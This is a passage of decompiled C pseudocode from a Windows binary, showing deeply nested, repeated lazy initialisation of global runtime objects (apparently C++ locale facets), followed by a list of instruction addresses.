                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t696, _t716);
                                                                                                													E00F856E6( &_v20, 0);
                                                                                                													_t717 =  *0xfd0b04; // 0x0
                                                                                                													_v4 = _v4 & 0x00000000;
                                                                                                													_v16 = _t717;
                                                                                                													_t697 = E00F78A40(_a8, E00F789D0());
                                                                                                													__eflags = _t697;
                                                                                                													if(_t697 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E( &_v20);
                                                                                                														return E00FB388C(_t697);
                                                                                                													} else {
                                                                                                														__eflags = _t717;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push(_a8);
                                                                                                															_push( &_v16);
                                                                                                															__eflags = E00F885EC(_t697, _t717, __eflags) - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_push(8);
                                                                                                																E00FB38B2(0xfb6ebe, _t697, _t717);
                                                                                                																E00F856E6( &_v20, 0);
                                                                                                																_t718 =  *0xfd0ad4; // 0x0
                                                                                                																_v4 = _v4 & 0x00000000;
                                                                                                																_v16 = _t718;
                                                                                                																_t698 = E00F78A40(_a8, E00F789D0());
                                                                                                																__eflags = _t698;
                                                                                                																if(_t698 != 0) {
                                                                                                																	L33:
                                                                                                																	E00F8573E( &_v20);
                                                                                                																	return E00FB388C(_t698);
                                                                                                																} else {
                                                                                                																	__eflags = _t718;
                                                                                                																	if(__eflags == 0) {
                                                                                                																		_push(_a8);
                                                                                                																		_push( &_v16);
                                                                                                																		__eflags = E00F88654(_t698, _t718, __eflags) - 0xffffffff;
                                                                                                																		if(__eflags == 0) {
                                                                                                																			E00F78FE0(__eflags);
                                                                                                																			asm("int3");
                                                                                                																			_push(8);
                                                                                                																			E00FB38B2(0xfb6ebe, _t698, _t718);
                                                                                                																			E00F856E6( &_v20, 0);
                                                                                                																			_t719 =  *0xfd0b08; // 0x0
                                                                                                																			_v4 = _v4 & 0x00000000;
                                                                                                																			_v16 = _t719;
                                                                                                																			_t699 = E00F78A40(_a8, E00F789D0());
                                                                                                																			__eflags = _t699;
                                                                                                																			if(_t699 != 0) {
                                                                                                																				L40:
                                                                                                																				E00F8573E( &_v20);
                                                                                                																				return E00FB388C(_t699);
                                                                                                																			} else {
                                                                                                																				__eflags = _t719;
                                                                                                																				if(__eflags == 0) {
                                                                                                																					_push(_a8);
                                                                                                																					_push( &_v16);
                                                                                                																					__eflags = E00F886BC(_t699, _t719, __eflags) - 0xffffffff;
                                                                                                																					if(__eflags == 0) {
                                                                                                																						E00F78FE0(__eflags);
                                                                                                																						asm("int3");
                                                                                                																						_push(8);
                                                                                                																						E00FB38B2(0xfb6ebe, _t699, _t719);
                                                                                                																						E00F856E6( &_v20, 0);
                                                                                                																						_t720 =  *0xfd0ad8; // 0x0
                                                                                                																						_v4 = _v4 & 0x00000000;
                                                                                                																						_v16 = _t720;
                                                                                                																						_t700 = E00F78A40(_a8, E00F789D0());
                                                                                                																						__eflags = _t700;
                                                                                                																						if(_t700 != 0) {
                                                                                                																							L47:
                                                                                                																							E00F8573E( &_v20);
                                                                                                																							return E00FB388C(_t700);
                                                                                                																						} else {
                                                                                                																							__eflags = _t720;
                                                                                                																							if(__eflags == 0) {
                                                                                                																								_push(_a8);
                                                                                                																								_push( &_v16);
                                                                                                																								__eflags = E00F88724(_t700, _t720, __eflags) - 0xffffffff;
                                                                                                																								if(__eflags == 0) {
                                                                                                																									E00F78FE0(__eflags);
                                                                                                																									asm("int3");
                                                                                                																									_push(8);
                                                                                                																									E00FB38B2(0xfb6ebe, _t700, _t720);
                                                                                                																									E00F856E6( &_v20, 0);
                                                                                                																									_t721 =  *0xfd0b0c; // 0x0
                                                                                                																									_v4 = _v4 & 0x00000000;
                                                                                                																									_v16 = _t721;
                                                                                                																									_t701 = E00F78A40(_a8, E00F789D0());
                                                                                                																									__eflags = _t701;
                                                                                                																									if(_t701 != 0) {
                                                                                                																										L54:
                                                                                                																										E00F8573E( &_v20);
                                                                                                																										return E00FB388C(_t701);
                                                                                                																									} else {
                                                                                                																										__eflags = _t721;
                                                                                                																										if(__eflags == 0) {
                                                                                                																											_push(_a8);
                                                                                                																											_push( &_v16);
                                                                                                																											__eflags = E00F8878C(_t701, _t721, __eflags) - 0xffffffff;
                                                                                                																											if(__eflags == 0) {
                                                                                                																												E00F78FE0(__eflags);
                                                                                                																												asm("int3");
                                                                                                																												_push(8);
                                                                                                																												E00FB38B2(0xfb6ebe, _t701, _t721);
                                                                                                																												E00F856E6( &_v20, 0);
                                                                                                																												_t722 =  *0xfd0adc; // 0x0
                                                                                                																												_v4 = _v4 & 0x00000000;
                                                                                                																												_v16 = _t722;
                                                                                                																												_t702 = E00F78A40(_a8, E00F789D0());
                                                                                                																												__eflags = _t702;
                                                                                                																												if(_t702 != 0) {
                                                                                                																													L61:
                                                                                                																													E00F8573E( &_v20);
                                                                                                																													return E00FB388C(_t702);
                                                                                                																												} else {
                                                                                                																													__eflags = _t722;
                                                                                                																													if(__eflags == 0) {
                                                                                                																														_push(_a8);
                                                                                                																														_push( &_v16);
                                                                                                																														__eflags = E00F887F4(_t702, _t722, __eflags) - 0xffffffff;
                                                                                                																														if(__eflags == 0) {
                                                                                                																															E00F78FE0(__eflags);
                                                                                                																															asm("int3");
                                                                                                																															_push(8);
                                                                                                																															E00FB38B2(0xfb6ebe, _t702, _t722);
                                                                                                																															E00F856E6( &_v20, 0);
                                                                                                																															_t723 =  *0xfd0b14; // 0x0
                                                                                                																															_v4 = _v4 & 0x00000000;
                                                                                                																															_v16 = _t723;
                                                                                                																															_t703 = E00F78A40(_a8, E00F789D0());
                                                                                                																															__eflags = _t703;
                                                                                                																															if(_t703 != 0) {
                                                                                                																																L68:
                                                                                                																																E00F8573E( &_v20);
                                                                                                																																return E00FB388C(_t703);
                                                                                                																															} else {
                                                                                                																																__eflags = _t723;
                                                                                                																																if(__eflags == 0) {
                                                                                                																																	_push(_a8);
                                                                                                																																	_push( &_v16);
                                                                                                																																	__eflags = E00F8885C(_t703, _t723, __eflags) - 0xffffffff;
                                                                                                																																	if(__eflags == 0) {
                                                                                                																																		E00F78FE0(__eflags);
                                                                                                																																		asm("int3");
                                                                                                																																		_push(8);
                                                                                                																																		E00FB38B2(0xfb6ebe, _t703, _t723);
                                                                                                																																		E00F856E6( &_v20, 0);
                                                                                                																																		_t724 =  *0xfd0b10; // 0x0
                                                                                                																																		_v4 = _v4 & 0x00000000;
                                                                                                																																		_v16 = _t724;
                                                                                                																																		_t704 = E00F78A40(_a8, E00F789D0());
                                                                                                																																		__eflags = _t704;
                                                                                                																																		if(_t704 != 0) {
                                                                                                																																			L75:
                                                                                                																																			E00F8573E( &_v20);
                                                                                                																																			return E00FB388C(_t704);
                                                                                                																																		} else {
                                                                                                																																			__eflags = _t724;
                                                                                                																																			if(__eflags == 0) {
                                                                                                																																				_push(_a8);
                                                                                                																																				_push( &_v16);
                                                                                                																																				__eflags = E00F888E0(_t704, _t724, __eflags) - 0xffffffff;
                                                                                                																																				if(__eflags == 0) {
                                                                                                																																					E00F78FE0(__eflags);
                                                                                                																																					asm("int3");
                                                                                                																																					_push(8);
                                                                                                																																					E00FB38B2(0xfb6ebe, _t704, _t724);
                                                                                                																																					E00F856E6( &_v20, 0);
                                                                                                																																					_t725 =  *0xfd0ae4; // 0x0
                                                                                                																																					_v4 = _v4 & 0x00000000;
                                                                                                																																					_v16 = _t725;
                                                                                                																																					_t705 = E00F78A40(_a8, E00F789D0());
                                                                                                																																					__eflags = _t705;
                                                                                                																																					if(_t705 != 0) {
                                                                                                																																						L82:
                                                                                                																																						E00F8573E( &_v20);
                                                                                                																																						return E00FB388C(_t705);
                                                                                                																																					} else {
                                                                                                																																						__eflags = _t725;
                                                                                                																																						if(__eflags == 0) {
                                                                                                																																							_push(_a8);
                                                                                                																																							_push( &_v16);
                                                                                                																																							__eflags = E00F88965(_t705, _t725, __eflags) - 0xffffffff;
                                                                                                																																							if(__eflags == 0) {
                                                                                                																																								E00F78FE0(__eflags);
                                                                                                																																								asm("int3");
                                                                                                																																								_push(8);
                                                                                                																																								E00FB38B2(0xfb6ebe, _t705, _t725);
                                                                                                																																								E00F856E6( &_v20, 0);
                                                                                                																																								_t726 =  *0xfd0ae0; // 0x0
                                                                                                																																								_v4 = _v4 & 0x00000000;
                                                                                                																																								_v16 = _t726;
                                                                                                																																								_t706 = E00F78A40(_a8, E00F789D0());
                                                                                                																																								__eflags = _t706;
                                                                                                																																								if(_t706 != 0) {
                                                                                                																																									L89:
                                                                                                																																									E00F8573E( &_v20);
                                                                                                																																									return E00FB388C(_t706);
                                                                                                																																								} else {
                                                                                                																																									__eflags = _t726;
                                                                                                																																									if(__eflags == 0) {
                                                                                                																																										_push(_a8);
                                                                                                																																										_push( &_v16);
                                                                                                																																										__eflags = E00F889E9(_t706, _t726, __eflags) - 0xffffffff;
                                                                                                																																										if(__eflags == 0) {
                                                                                                																																											E00F78FE0(__eflags);
                                                                                                																																											asm("int3");
                                                                                                																																											_push(8);
                                                                                                																																											E00FB38B2(0xfb6ebe, _t706, _t726);
                                                                                                																																											E00F856E6( &_v20, 0);
                                                                                                																																											_t727 =  *0xfd0af4; // 0x0
                                                                                                																																											_v4 = _v4 & 0x00000000;
                                                                                                																																											_v16 = _t727;
                                                                                                																																											_t707 = E00F78A40(_a8, E00F789D0());
                                                                                                																																											__eflags = _t707;
                                                                                                																																											if(_t707 != 0) {
                                                                                                																																												L96:
                                                                                                																																												E00F8573E( &_v20);
                                                                                                																																												return E00FB388C(_t707);
                                                                                                																																											} else {
                                                                                                																																												__eflags = _t727;
                                                                                                																																												if(__eflags == 0) {
                                                                                                																																													_push(_a8);
                                                                                                																																													_push( &_v16);
                                                                                                																																													__eflags = E00F88A6E(_t707, _t727, __eflags) - 0xffffffff;
                                                                                                																																													if(__eflags == 0) {
                                                                                                																																														E00F78FE0(__eflags);
                                                                                                																																														asm("int3");
                                                                                                																																														_push(8);
                                                                                                																																														E00FB38B2(0xfb6ebe, _t707, _t727);
                                                                                                																																														E00F856E6( &_v20, 0);
                                                                                                																																														_t728 =  *0xfd0af8; // 0x0
                                                                                                																																														_v4 = _v4 & 0x00000000;
                                                                                                																																														_v16 = _t728;
                                                                                                																																														_t708 = E00F78A40(_a8, E00F789D0());
                                                                                                																																														__eflags = _t708;
                                                                                                																																														if(_t708 != 0) {
                                                                                                																																															L103:
                                                                                                																																															E00F8573E( &_v20);
                                                                                                																																															return E00FB388C(_t708);
                                                                                                																																														} else {
                                                                                                																																															__eflags = _t728;
                                                                                                																																															if(__eflags == 0) {
                                                                                                																																																_push(_a8);
                                                                                                																																																_push( &_v16);
                                                                                                																																																__eflags = E00F88AD6(_t708, _t728, __eflags) - 0xffffffff;
                                                                                                																																																if(__eflags == 0) {
                                                                                                																																																	E00F78FE0(__eflags);
                                                                                                																																																	asm("int3");
                                                                                                																																																	_push(8);
                                                                                                																																																	E00FB38B2(0xfb6ebe, _t708, _t728);
                                                                                                																																																	E00F856E6( &_v20, 0);
                                                                                                																																																	_t729 =  *0xfd0afc; // 0x0
                                                                                                																																																	_v4 = _v4 & 0x00000000;
                                                                                                																																																	_v16 = _t729;
                                                                                                																																																	_t709 = E00F78A40(_a8, E00F789D0());
                                                                                                																																																	__eflags = _t709;
                                                                                                																																																	if(_t709 != 0) {
                                                                                                																																																		L110:
                                                                                                																																																		E00F8573E( &_v20);
                                                                                                																																																		return E00FB388C(_t709);
                                                                                                																																																	} else {
                                                                                                																																																		__eflags = _t729;
                                                                                                																																																		if(__eflags == 0) {
                                                                                                																																																			_push(_a8);
                                                                                                																																																			_push( &_v16);
                                                                                                																																																			__eflags = E00F88B3E(_t692, _t709, _t729, __eflags) - 0xffffffff;
                                                                                                																																																			if(__eflags == 0) {
                                                                                                																																																				E00F78FE0(__eflags);
                                                                                                																																																				asm("int3");
                                                                                                																																																				_push(8);
                                                                                                																																																				E00FB38B2(0xfb6ebe, _t709, _t729);
                                                                                                																																																				E00F856E6( &_v20, 0);
                                                                                                																																																				_t730 =  *0xfd0b18; // 0x0
                                                                                                																																																				_v4 = _v4 & 0x00000000;
                                                                                                																																																				_v16 = _t730;
                                                                                                																																																				_t710 = E00F78A40(_a8, E00F789D0());
                                                                                                																																																				__eflags = _t710;
                                                                                                																																																				if(_t710 != 0) {
                                                                                                																																																					L117:
                                                                                                																																																					E00F8573E( &_v20);
                                                                                                																																																					return E00FB388C(_t710);
                                                                                                																																																				} else {
                                                                                                																																																					__eflags = _t730;
                                                                                                																																																					if(__eflags == 0) {
                                                                                                																																																						_push(_a8);
                                                                                                																																																						_push( &_v16);
                                                                                                																																																						__eflags = E00F88BB9(_t710, _t730, __eflags) - 0xffffffff;
                                                                                                																																																						if(__eflags == 0) {
                                                                                                																																																							E00F78FE0(__eflags);
                                                                                                																																																							asm("int3");
                                                                                                																																																							_push(8);
                                                                                                																																																							E00FB38B2(0xfb6ebe, _t710, _t730);
                                                                                                																																																							E00F856E6( &_v20, 0);
                                                                                                																																																							_t731 =  *0xfd0ae8; // 0x0
                                                                                                																																																							_v4 = _v4 & 0x00000000;
                                                                                                																																																							_v16 = _t731;
                                                                                                																																																							_t711 = E00F78A40(_a8, E00F789D0());
                                                                                                																																																							__eflags = _t711;
                                                                                                																																																							if(_t711 != 0) {
                                                                                                																																																								L124:
                                                                                                																																																								E00F8573E( &_v20);
                                                                                                																																																								return E00FB388C(_t711);
                                                                                                																																																							} else {
                                                                                                																																																								__eflags = _t731;
                                                                                                																																																								if(__eflags == 0) {
                                                                                                																																																									_push(_a8);
                                                                                                																																																									_push( &_v16);
                                                                                                																																																									__eflags = E00F88C25(_t711, _t731, __eflags) - 0xffffffff;
                                                                                                																																																									if(__eflags == 0) {
                                                                                                																																																										E00F78FE0(__eflags);
                                                                                                																																																										asm("int3");
                                                                                                																																																										_push(8);
                                                                                                																																																										E00FB38B2(0xfb6ebe, _t711, _t731);
                                                                                                																																																										E00F856E6( &_v20, 0);
                                                                                                																																																										_t732 =  *0xfd0b1c; // 0x0
                                                                                                																																																										_v4 = _v4 & 0x00000000;
                                                                                                																																																										_v16 = _t732;
                                                                                                																																																										_t712 = E00F78A40(_a8, E00F789D0());
                                                                                                																																																										__eflags = _t712;
                                                                                                																																																										if(_t712 != 0) {
                                                                                                																																																											L131:
                                                                                                																																																											E00F8573E( &_v20);
                                                                                                																																																											return E00FB388C(_t712);
                                                                                                																																																										} else {
                                                                                                																																																											__eflags = _t732;
                                                                                                																																																											if(__eflags == 0) {
                                                                                                																																																												_push(_a8);
                                                                                                																																																												_push( &_v16);
                                                                                                																																																												_t440 = E00F88C91(_t712, _t732, __eflags);
                                                                                                																																																												_pop(_t634);
                                                                                                																																																												__eflags = _t440 - 0xffffffff;
                                                                                                																																																												if(__eflags == 0) {
                                                                                                																																																													E00F78FE0(__eflags);
                                                                                                																																																													asm("int3");
                                                                                                																																																													_push(_t732);
                                                                                                																																																													_t733 = _t634;
                                                                                                																																																													_t230 = _t733 + 0x10;
                                                                                                																																																													 *_t230 =  *(_t733 + 0x10) & 0x00000000;
                                                                                                																																																													__eflags =  *_t230;
                                                                                                																																																													 *((intOrPtr*)(_t733 + 0x14)) = 7;
                                                                                                																																																													 *_t733 = 0;
                                                                                                																																																													E00F8D9F3(_v72);
                                                                                                																																																													return _t733;
                                                                                                																																																												} else {
                                                                                                																																																													_t712 = _v16;
                                                                                                																																																													_v16 = _t712;
                                                                                                																																																													_v4 = 1;
                                                                                                																																																													E00F85472(_t712);
                                                                                                																																																													 *0xfb81fc();
                                                                                                																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t712 + 4))))();
                                                                                                																																																													 *0xfd0b1c = _t712;
                                                                                                																																																													goto L131;
                                                                                                																																																												}
                                                                                                																																																											} else {
                                                                                                																																																												_t712 = _t732;
                                                                                                																																																												goto L131;
                                                                                                																																																											}
                                                                                                																																																										}
                                                                                                																																																									} else {
                                                                                                																																																										_t711 = _v16;
                                                                                                																																																										_v16 = _t711;
                                                                                                																																																										_v4 = 1;
                                                                                                																																																										E00F85472(_t711);
                                                                                                																																																										 *0xfb81fc();
                                                                                                																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t711 + 4))))();
                                                                                                																																																										 *0xfd0ae8 = _t711;
                                                                                                																																																										goto L124;
                                                                                                																																																									}
                                                                                                																																																								} else {
                                                                                                																																																									_t711 = _t731;
                                                                                                																																																									goto L124;
                                                                                                																																																								}
                                                                                                																																																							}
                                                                                                																																																						} else {
                                                                                                																																																							_t710 = _v16;
                                                                                                																																																							_v16 = _t710;
                                                                                                																																																							_v4 = 1;
                                                                                                																																																							E00F85472(_t710);
                                                                                                																																																							 *0xfb81fc();
                                                                                                																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t710 + 4))))();
                                                                                                																																																							 *0xfd0b18 = _t710;
                                                                                                																																																							goto L117;
                                                                                                																																																						}
                                                                                                																																																					} else {
                                                                                                																																																						_t710 = _t730;
                                                                                                																																																						goto L117;
                                                                                                																																																					}
                                                                                                																																																				}
                                                                                                																																																			} else {
                                                                                                																																																				_t709 = _v16;
                                                                                                																																																				_v16 = _t709;
                                                                                                																																																				_v4 = 1;
                                                                                                																																																				E00F85472(_t709);
                                                                                                																																																				 *0xfb81fc();
                                                                                                																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t709 + 4))))();
                                                                                                																																																				 *0xfd0afc = _t709;
                                                                                                																																																				goto L110;
                                                                                                																																																			}
                                                                                                																																																		} else {
                                                                                                																																																			_t709 = _t729;
                                                                                                																																																			goto L110;
                                                                                                																																																		}
                                                                                                																																																	}
                                                                                                																																																} else {
                                                                                                																																																	_t708 = _v16;
                                                                                                																																																	_v16 = _t708;
                                                                                                																																																	_v4 = 1;
                                                                                                																																																	E00F85472(_t708);
                                                                                                																																																	 *0xfb81fc();
                                                                                                																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t708 + 4))))();
                                                                                                																																																	 *0xfd0af8 = _t708;
                                                                                                																																																	goto L103;
                                                                                                																																																}
                                                                                                																																															} else {
                                                                                                																																																_t708 = _t728;
                                                                                                																																																goto L103;
                                                                                                																																															}
                                                                                                																																														}
                                                                                                																																													} else {
                                                                                                																																														_t707 = _v16;
                                                                                                																																														_v16 = _t707;
                                                                                                																																														_v4 = 1;
                                                                                                																																														E00F85472(_t707);
                                                                                                																																														 *0xfb81fc();
                                                                                                																																														 *((intOrPtr*)( *((intOrPtr*)( *_t707 + 4))))();
                                                                                                																																														 *0xfd0af4 = _t707;
                                                                                                																																														goto L96;
                                                                                                																																													}
                                                                                                																																												} else {
                                                                                                																																													_t707 = _t727;
                                                                                                																																													goto L96;
                                                                                                																																												}
                                                                                                																																											}
                                                                                                																																										} else {
                                                                                                																																											_t706 = _v16;
                                                                                                																																											_v16 = _t706;
                                                                                                																																											_v4 = 1;
                                                                                                																																											E00F85472(_t706);
                                                                                                																																											 *0xfb81fc();
                                                                                                																																											 *((intOrPtr*)( *((intOrPtr*)( *_t706 + 4))))();
                                                                                                																																											 *0xfd0ae0 = _t706;
                                                                                                																																											goto L89;
                                                                                                																																										}
                                                                                                																																									} else {
                                                                                                																																										_t706 = _t726;
                                                                                                																																										goto L89;
                                                                                                																																									}
                                                                                                																																								}
                                                                                                																																							} else {
                                                                                                																																								_t705 = _v16;
                                                                                                																																								_v16 = _t705;
                                                                                                																																								_v4 = 1;
                                                                                                																																								E00F85472(_t705);
                                                                                                																																								 *0xfb81fc();
                                                                                                																																								 *((intOrPtr*)( *((intOrPtr*)( *_t705 + 4))))();
                                                                                                																																								 *0xfd0ae4 = _t705;
                                                                                                																																								goto L82;
                                                                                                																																							}
                                                                                                																																						} else {
                                                                                                																																							_t705 = _t725;
                                                                                                																																							goto L82;
                                                                                                																																						}
                                                                                                																																					}
                                                                                                																																				} else {
                                                                                                																																					_t704 = _v16;
                                                                                                																																					_v16 = _t704;
                                                                                                																																					_v4 = 1;
                                                                                                																																					E00F85472(_t704);
                                                                                                																																					 *0xfb81fc();
                                                                                                																																					 *((intOrPtr*)( *((intOrPtr*)( *_t704 + 4))))();
                                                                                                																																					 *0xfd0b10 = _t704;
                                                                                                																																					goto L75;
                                                                                                																																				}
                                                                                                																																			} else {
                                                                                                																																				_t704 = _t724;
                                                                                                																																				goto L75;
                                                                                                																																			}
                                                                                                																																		}
                                                                                                																																	} else {
                                                                                                																																		_t703 = _v16;
                                                                                                																																		_v16 = _t703;
                                                                                                																																		_v4 = 1;
                                                                                                																																		E00F85472(_t703);
                                                                                                																																		 *0xfb81fc();
                                                                                                																																		 *((intOrPtr*)( *((intOrPtr*)( *_t703 + 4))))();
                                                                                                																																		 *0xfd0b14 = _t703;
                                                                                                																																		goto L68;
                                                                                                																																	}
                                                                                                																																} else {
                                                                                                																																	_t703 = _t723;
                                                                                                																																	goto L68;
                                                                                                																																}
                                                                                                																															}
                                                                                                																														} else {
                                                                                                																															_t702 = _v16;
                                                                                                																															_v16 = _t702;
                                                                                                																															_v4 = 1;
                                                                                                																															E00F85472(_t702);
                                                                                                																															 *0xfb81fc();
                                                                                                																															 *((intOrPtr*)( *((intOrPtr*)( *_t702 + 4))))();
                                                                                                																															 *0xfd0adc = _t702;
                                                                                                																															goto L61;
                                                                                                																														}
                                                                                                																													} else {
                                                                                                																														_t702 = _t722;
                                                                                                																														goto L61;
                                                                                                																													}
                                                                                                																												}
                                                                                                																											} else {
                                                                                                																												_t701 = _v16;
                                                                                                																												_v16 = _t701;
                                                                                                																												_v4 = 1;
                                                                                                																												E00F85472(_t701);
                                                                                                																												 *0xfb81fc();
                                                                                                																												 *((intOrPtr*)( *((intOrPtr*)( *_t701 + 4))))();
                                                                                                																												 *0xfd0b0c = _t701;
                                                                                                																												goto L54;
                                                                                                																											}
                                                                                                																										} else {
                                                                                                																											_t701 = _t721;
                                                                                                																											goto L54;
                                                                                                																										}
                                                                                                																									}
                                                                                                																								} else {
                                                                                                																									_t700 = _v16;
                                                                                                																									_v16 = _t700;
                                                                                                																									_v4 = 1;
                                                                                                																									E00F85472(_t700);
                                                                                                																									 *0xfb81fc();
                                                                                                																									 *((intOrPtr*)( *((intOrPtr*)( *_t700 + 4))))();
                                                                                                																									 *0xfd0ad8 = _t700;
                                                                                                																									goto L47;
                                                                                                																								}
                                                                                                																							} else {
                                                                                                																								_t700 = _t720;
                                                                                                																								goto L47;
                                                                                                																							}
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t699 = _v16;
                                                                                                																						_v16 = _t699;
                                                                                                																						_v4 = 1;
                                                                                                																						E00F85472(_t699);
                                                                                                																						 *0xfb81fc();
                                                                                                																						 *((intOrPtr*)( *((intOrPtr*)( *_t699 + 4))))();
                                                                                                																						 *0xfd0b08 = _t699;
                                                                                                																						goto L40;
                                                                                                																					}
                                                                                                																				} else {
                                                                                                																					_t699 = _t719;
                                                                                                																					goto L40;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			_t698 = _v16;
                                                                                                																			_v16 = _t698;
                                                                                                																			_v4 = 1;
                                                                                                																			E00F85472(_t698);
                                                                                                																			 *0xfb81fc();
                                                                                                																			 *((intOrPtr*)( *((intOrPtr*)( *_t698 + 4))))();
                                                                                                																			 *0xfd0ad4 = _t698;
                                                                                                																			goto L33;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_t698 = _t718;
                                                                                                																		goto L33;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t697 = _v16;
                                                                                                																_v16 = _t697;
                                                                                                																_v4 = 1;
                                                                                                																E00F85472(_t697);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t697 + 4))))();
                                                                                                																 *0xfd0b04 = _t697;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t697 = _t717;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t696 = _v16;
                                                                                                													_v16 = _t696;
                                                                                                													_v4 = 1;
                                                                                                													E00F85472(_t696);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t696 + 4))))();
                                                                                                													 *0xfd0af0 = _t696;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t696 = _t716;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t695 = _v16;
                                                                                                										_v16 = _t695;
                                                                                                										_v4 = 1;
                                                                                                										E00F85472(_t695);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t695 + 4))))();
                                                                                                										 *0xfd0ad0 = _t695;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t695 = _t715;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t694 = _v16;
                                                                                                							_v16 = _t694;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t694);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t694 + 4))))();
                                                                                                							 *0xfd0b00 = _t694;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t694 = _t714;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}

















































                                                                                                0x00f86f70
                                                                                                0x00f86f70
                                                                                                0x00f86f77
                                                                                                0x00f86f81
                                                                                                0x00f86f86
                                                                                                0x00f86f91
                                                                                                0x00f86f95
                                                                                                0x00f86fa1
                                                                                                0x00f86fa6
                                                                                                0x00f86faa
                                                                                                0x00f86fef
                                                                                                0x00f86ff2
                                                                                                0x00f86ffe
                                                                                                0x00f86fac
                                                                                                0x00f86fae
                                                                                                0x00f86fb4
                                                                                                0x00f86fba
                                                                                                0x00f86fc2
                                                                                                0x00f86fc5
                                                                                                0x00f86fff
                                                                                                0x00f87004
                                                                                                0x00f87005
                                                                                                0x00f8700c
                                                                                                0x00f87016
                                                                                                0x00f8701b
                                                                                                0x00f87026
                                                                                                0x00f8702a
                                                                                                0x00f8703b
                                                                                                0x00f8703d
                                                                                                0x00f8703f
                                                                                                0x00f87084
                                                                                                0x00f87087
                                                                                                0x00f87093
                                                                                                0x00f87041
                                                                                                0x00f87041
                                                                                                0x00f87043
                                                                                                0x00f87049
                                                                                                0x00f8704f
                                                                                                0x00f87057
                                                                                                0x00f8705a
                                                                                                0x00f87094
                                                                                                0x00f87099
                                                                                                0x00f8709a
                                                                                                0x00f870a1
                                                                                                0x00f870ab
                                                                                                0x00f870b0
                                                                                                0x00f870bb
                                                                                                0x00f870bf
                                                                                                0x00f870d0
                                                                                                0x00f870d2
                                                                                                0x00f870d4
                                                                                                0x00f87119
                                                                                                0x00f8711c
                                                                                                0x00f87128
                                                                                                0x00f870d6
                                                                                                0x00f870d6
                                                                                                0x00f870d8
                                                                                                0x00f870de
                                                                                                0x00f870e4
                                                                                                0x00f870ec
                                                                                                0x00f870ef
                                                                                                0x00f87129
                                                                                                0x00f8712e
                                                                                                0x00f8712f
                                                                                                0x00f87136
                                                                                                0x00f87140
                                                                                                0x00f87145
                                                                                                0x00f87150
                                                                                                0x00f87154
                                                                                                0x00f87165
                                                                                                0x00f87167
                                                                                                0x00f87169
                                                                                                0x00f871ae
                                                                                                0x00f871b1
                                                                                                0x00f871bd
                                                                                                0x00f8716b
                                                                                                0x00f8716b
                                                                                                0x00f8716d
                                                                                                0x00f87173
                                                                                                0x00f87179
                                                                                                0x00f87181
                                                                                                0x00f87184
                                                                                                0x00f871be
                                                                                                0x00f871c3
                                                                                                0x00f871c4
                                                                                                0x00f871cb
                                                                                                0x00f871d5
                                                                                                0x00f871da
                                                                                                0x00f871e5
                                                                                                0x00f871e9
                                                                                                0x00f871fa
                                                                                                0x00f871fc
                                                                                                0x00f871fe
                                                                                                0x00f87243
                                                                                                0x00f87246
                                                                                                0x00f87252
                                                                                                0x00f87200
                                                                                                0x00f87200
                                                                                                0x00f87202
                                                                                                0x00f87208
                                                                                                0x00f8720e
                                                                                                0x00f87216
                                                                                                0x00f87219
                                                                                                0x00f87253
                                                                                                0x00f87258
                                                                                                0x00f87259
                                                                                                0x00f87260
                                                                                                0x00f8726a
                                                                                                0x00f8726f
                                                                                                0x00f8727a
                                                                                                0x00f8727e
                                                                                                0x00f8728f
                                                                                                0x00f87291
                                                                                                0x00f87293
                                                                                                0x00f872d8
                                                                                                0x00f872db
                                                                                                0x00f872e7
                                                                                                0x00f87295
                                                                                                0x00f87295
                                                                                                0x00f87297
                                                                                                0x00f8729d
                                                                                                0x00f872a3
                                                                                                0x00f872ab
                                                                                                0x00f872ae
                                                                                                0x00f872e8
                                                                                                0x00f872ed
                                                                                                0x00f872ee
                                                                                                0x00f872f5
                                                                                                0x00f872ff
                                                                                                0x00f87304
                                                                                                0x00f8730f
                                                                                                0x00f87313
                                                                                                0x00f87324
                                                                                                0x00f87326
                                                                                                0x00f87328
                                                                                                0x00f8736d
                                                                                                0x00f87370
                                                                                                0x00f8737c
                                                                                                0x00f8732a
                                                                                                0x00f8732a
                                                                                                0x00f8732c
                                                                                                0x00f87332
                                                                                                0x00f87338
                                                                                                0x00f87340
                                                                                                0x00f87343
                                                                                                0x00f8737d
                                                                                                0x00f87382
                                                                                                0x00f87383
                                                                                                0x00f8738a
                                                                                                0x00f87394
                                                                                                0x00f87399
                                                                                                0x00f873a4
                                                                                                0x00f873a8
                                                                                                0x00f873b9
                                                                                                0x00f873bb
                                                                                                0x00f873bd
